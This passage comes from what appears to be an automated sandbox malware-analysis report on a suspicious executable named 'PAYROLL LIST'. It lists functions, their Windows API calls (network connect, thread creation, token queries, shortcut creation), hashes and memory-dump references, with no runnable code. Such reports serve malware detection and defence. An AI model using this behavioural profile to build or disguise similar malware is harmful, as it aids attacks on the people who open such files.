Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 878822b2a8acbbf1fce9a3f4df016a878cccb9185db5af8e852a4b5cfc1b244d
Instruction ID: e8a32e2a31dfc33692358dba50dc95924ecf2d551124a5e62eb21f6b783c649a
Opcode Fuzzy Hash: 878822b2a8acbbf1fce9a3f4df016a878cccb9185db5af8e852a4b5cfc1b244d
Instruction Fuzzy Hash: FC21F571611262AFCB24AFB8CC84B6A3BA4FB15734F150324F967CA5E0E7309C51DB80

Function 00A5BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A5BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A5BCC2
__itow.LIBCMT ref: 00A5BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A5BD00
__itow.LIBCMT ref: 00A5BD11

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 9d456027a7c01303e3acdff2d15130272b7e92fbd46bac144cad8d970e4cf845
Instruction ID: 0035464ab1a947602643323f3c8a72d1bc01357bf28829811ab835146ad8968c
Opcode Fuzzy Hash: 9d456027a7c01303e3acdff2d15130272b7e92fbd46bac144cad8d970e4cf845
Instruction Fuzzy Hash: 9C21C636610218BADB10AB699D46FDE7A79BF5A752F000025FD06EB181EBB0894987B1

Function 00A66318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00A250E6: _wcsncpy.LIBCMT ref: 00A250FA

GetFileAttributesW.KERNEL32(?,?,?,?,00A660C3), ref: 00A66369
GetLastError.KERNEL32(?,?,?,00A660C3), ref: 00A66374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00A660C3), ref: 00A66388
_wcsrchr.LIBCMT ref: 00A663AA

Part of subcall function 00A66318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00A660C3), ref: 00A663E0

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 310a37e77a037cd4bc640a352832ea7900eec802cd163c740b39833b41744ca6
Instruction ID: f780c2b08f7f2cac450ef3d1f922471c6b40f264a8fb72d237f7e623120b2a0d
Opcode Fuzzy Hash: 310a37e77a037cd4bc640a352832ea7900eec802cd163c740b39833b41744ca6
Instruction Fuzzy Hash: 0E21E7319046159BDF15EBB8AD42FEA33BCEF1A760F10046AF046DB2C1EB60DD858A65

Function 00A78B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7A82C: inet_addr.WSOCK32(00000000), ref: 00A7A84E

socket.WSOCK32(00000002,00000001,00000006), ref: 00A78BD3
WSAGetLastError.WSOCK32(00000000), ref: 00A78BE2
connect.WSOCK32(00000000,?,00000010), ref: 00A78BFE

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 799fb27d627e35137650abc3f96619554084a2321ccc7c8ff49b5b444451896c
Instruction ID: d5b29a18a6881c059168f3beef01666157f0185d367bfad7334ce3f7f6d68f81
Opcode Fuzzy Hash: 799fb27d627e35137650abc3f96619554084a2321ccc7c8ff49b5b444451896c
Instruction Fuzzy Hash: AD2190312402159FCB14EF68DD89B7E77ADAF49720F04C459F956AB2D2CF78AC028B61

Function 00A78420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A78441
GetForegroundWindow.USER32 ref: 00A78458
GetDC.USER32(00000000), ref: 00A78494
GetPixel.GDI32(00000000,?,00000003), ref: 00A784A0
ReleaseDC.USER32(00000000,00000003), ref: 00A784DB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 51cc2aac6fd73a2a350af2f83098e9bf28cf84d5956bbc34b51e617effc62663
Instruction ID: a4253a039f68c92f7a157827b523ef6421dc496f8b1d5afeb84bb78f702e8773
Opcode Fuzzy Hash: 51cc2aac6fd73a2a350af2f83098e9bf28cf84d5956bbc34b51e617effc62663
Instruction Fuzzy Hash: 51215E75A00205AFD700DFA4DD89AAEBBF5EF49301F04C479E85A97651DB74AC41CB60

Function 00A3AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00A3AFE3
SelectObject.GDI32(?,00000000), ref: 00A3AFF2
BeginPath.GDI32(?), ref: 00A3B009
SelectObject.GDI32(?,00000000), ref: 00A3B033

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: e666b8a79705a8872ccd7eeeed762c7647070623674c5e3d407943eb33aa8a79
Instruction ID: 2ab8f26f188f99729b9387703d82e281bd08fa9549e277f84045972862246e97
Opcode Fuzzy Hash: e666b8a79705a8872ccd7eeeed762c7647070623674c5e3d407943eb33aa8a79
Instruction Fuzzy Hash: 42217FB09003A5EFDB10DF95EC88B9A7B79BB21355F14431AF5659A1E0C3705982CFA1

Function 00A4217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00A421A9
CreateThread.KERNEL32(?,?,00A422DF,00000000,?,?), ref: 00A421ED
GetLastError.KERNEL32 ref: 00A421F7
_free.LIBCMT ref: 00A42200
__dosmaperr.LIBCMT ref: 00A4220B

Part of subcall function 00A47C0E: __getptd_noexit.LIBCMT ref: 00A47C0E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 2a717ebff90bf48c8561e3286ed0825231ca1adb97c8e3bf080625c1218c0214
Instruction ID: a15ffd99ce6e5acfa5f6e378d345492f11dc34fe0b818c5123b64c24cad9c744
Opcode Fuzzy Hash: 2a717ebff90bf48c8561e3286ed0825231ca1adb97c8e3bf080625c1218c0214
Instruction Fuzzy Hash: 1D11263B104346AFDB11AFA8DD42EAF3BA9EFC1770B100529F914C7182EBB1D80187A1

Function 00A5ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00A5ABD7
GetLastError.KERNEL32(?,00A5A69F,?,?,?), ref: 00A5ABE1
GetProcessHeap.KERNEL32(00000008,?,?,00A5A69F,?,?,?), ref: 00A5ABF0
HeapAlloc.KERNEL32(00000000,?,00A5A69F,?,?,?), ref: 00A5ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00A5AC0E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d67b85415e3c4b4cbcc00c1ffa05ca4a973da95407edafef73c07fa65f72fadb
Instruction ID: 4331ff0f044c213fc3e92144eaf158e3f7900d22586ac227d13f3e02e1da5bcb
Opcode Fuzzy Hash: d67b85415e3c4b4cbcc00c1ffa05ca4a973da95407edafef73c07fa65f72fadb
Instruction Fuzzy Hash: 4901F671310205BFDB108FE9DC48DAB7AADFF8A7557100629F986C22A0DB719C45CA61

Function 00A59ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00A59ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00A59AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00A59B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00A59B15
CLSIDFromString.OLE32(?,?), ref: 00A59B21

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 939c6ebe7b489d8b858d7a974de821983524c87260f8f5f0d41bac175c0c168a
Instruction ID: b2821baf64f2ed5011533c12d9e94724f0fc38e1ee2e9e9e39c5b12d794448e5
Opcode Fuzzy Hash: 939c6ebe7b489d8b858d7a974de821983524c87260f8f5f0d41bac175c0c168a
Instruction Fuzzy Hash: 3F01DF76600205FFEB008F98EC04B9ABBFCEB49352F154028FD06DA250D774CD059BA0

Function 00A67A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A67A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A67A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A67A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A67A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00A67AD0

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 5a1a8e440717e85c5812b13192194ed17fd32bb8c631b662aa1e603f57eafd94
Instruction ID: 032ee4e379cb128df6479c923083b9d5f34927c37bf54c820ddd8bd1b96044f1
Opcode Fuzzy Hash: 5a1a8e440717e85c5812b13192194ed17fd32bb8c631b662aa1e603f57eafd94
Instruction Fuzzy Hash: C4014831D1862AEBCF00EFE5DC48AEDBB78FF19795F000556E542B2290DB309655CBA1

Function 00A5AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A5AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A5AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A5AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A5AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A5AB10

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 865b7d2be88ba8cb011df30aabe384f538a8d46773992d7083c27990284f6790
Instruction ID: ec27c0c1b939a00be2abb91c8186c3619de068d0d972edc7b26f35d89512ef6a
Opcode Fuzzy Hash: 865b7d2be88ba8cb011df30aabe384f538a8d46773992d7083c27990284f6790
Instruction Fuzzy Hash: 6FF04F713402096FEB114FA4EC88EA73B6DFF46756F000129FA82C7190DB709C068AB1

Function 00A5AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A5AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A5AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A5AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A5AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A5AAAF

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 17823540e08c71de05f06299238d2c85c29107dd8767356a24122335a0c79cad
Instruction ID: 12358d9351fa48cd368a05b20092b17a40995cdad6ee30b1c2d906e9cd192383
Opcode Fuzzy Hash: 17823540e08c71de05f06299238d2c85c29107dd8767356a24122335a0c79cad
Instruction Fuzzy Hash: 52F044713402096FEB115FE49C89E677B6CFF4A755F400519FA42C7190D7709C46CA61

Function 00A5EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00A5EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 00A5ECAB
MessageBeep.USER32(00000000), ref: 00A5ECC3
KillTimer.USER32(?,0000040A), ref: 00A5ECDF
EndDialog.USER32(?,00000001), ref: 00A5ECF9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: e5a613c43cc435b742938e33f119c69a519b26d2726a32e9b7c88e59aeeaa904
Instruction ID: 25698e587ae703ec1b1bf1d3014b153b45b1b48d8d6dd92303889f43cf20053d
Opcode Fuzzy Hash: e5a613c43cc435b742938e33f119c69a519b26d2726a32e9b7c88e59aeeaa904
Instruction Fuzzy Hash: C301A9305007169BEB29DB50DE4EB967778FF01706F004559B9D7614E1DBF0EA49CB80

Function 00A3B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00A3B0BA
StrokeAndFillPath.GDI32(?,?,00A9E680,00000000,?,?,?), ref: 00A3B0D6
SelectObject.GDI32(?,00000000), ref: 00A3B0E9
DeleteObject.GDI32 ref: 00A3B0FC
StrokePath.GDI32(?), ref: 00A3B117

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f0d56acf3fc4824940f05389a8e89b4cdded2f4a6313f98232c2aaf89a726b5e
Instruction ID: c3de6b53aa3760c4efef12df8547a99da24bcbe506967647486ae4e4036a40bf
Opcode Fuzzy Hash: f0d56acf3fc4824940f05389a8e89b4cdded2f4a6313f98232c2aaf89a726b5e
Instruction Fuzzy Hash: 5BF01970010285EFCB21DFA5EC4CB993F65A702366F088315F5A6484F0C7308A57DF20

Function 00A6F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A6F2DA
CoCreateInstance.OLE32(00AADA7C,00000000,00000001,00AAD8EC,?), ref: 00A6F2F2
CoUninitialize.OLE32 ref: 00A6F555

Strings

.lnk, xrefs: 00A6F28B, 00A6F290, 00A6F29E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 32c6eb59d7eef0e3fa6fac286be3160de6360e73807f60a38641a8b4c64238ce
Instruction ID: 5318c3ce7bed9a2a1f1a10eb7b5c3d478198c53059df5d6e42f1fb1797d924b5
Opcode Fuzzy Hash: 32c6eb59d7eef0e3fa6fac286be3160de6360e73807f60a38641a8b4c64238ce
Instruction Fuzzy Hash: 4BA11A71104301AFD700EF68D981EAFB7A8EF98714F00492DF59697192EB70EA49CB92

Function 00A6E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A2660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A253B1,?,?,00A261FF,?,00000000,00000001,00000000), ref: 00A2662F

CoInitialize.OLE32(00000000), ref: 00A6E85D
CoCreateInstance.OLE32(00AADA7C,00000000,00000001,00AAD8EC,?), ref: 00A6E876
CoUninitialize.OLE32 ref: 00A6E893

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

Strings

.lnk, xrefs: 00A6E83B, 00A6E84D

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 5ebea9e8b8b1629a2eab96fc5d7079c217398107a32338980654cb2fcba4be70
Instruction ID: 3e61a9bc35cb96906f7b68fbaf4a9f460acf9629c01a1f04692ce2b695dbf122
Opcode Fuzzy Hash: 5ebea9e8b8b1629a2eab96fc5d7079c217398107a32338980654cb2fcba4be70
Instruction Fuzzy Hash: 22A144796043119FCB14DF28C98492ABBF5BF89710F148998F9969B3A1CB31EC45CB91

Function 00A4325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00A432ED

Part of subcall function 00A4E0D0: __87except.LIBCMT ref: 00A4E10B

Strings

pow, xrefs: 00A432C5, 00A432E2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: fd7a5a80bcc7c50f96a646ab825fe86874623c3c7eeac25b84c9c9b3fd2f60f8
Instruction ID: a798010a3a35f468255090efe8f8fe185d75b98cb2ce8d4cb6196313ee620a91
Opcode Fuzzy Hash: fd7a5a80bcc7c50f96a646ab825fe86874623c3c7eeac25b84c9c9b3fd2f60f8
Instruction Fuzzy Hash: A7514D3AA0820296CF15FB18C9413BE3BA4BBE0710F348E69F4D6852E9DF749DC59B41

Function 00A64606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00ABDC50,?,0000000F,0000000C,00000016,00ABDC50,?), ref: 00A64645

Part of subcall function 00A2936C: __swprintf.LIBCMT ref: 00A293AB
Part of subcall function 00A2936C: __itow.LIBCMT ref: 00A293DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 00A646C5

Strings

THIS, xrefs: 00A64703
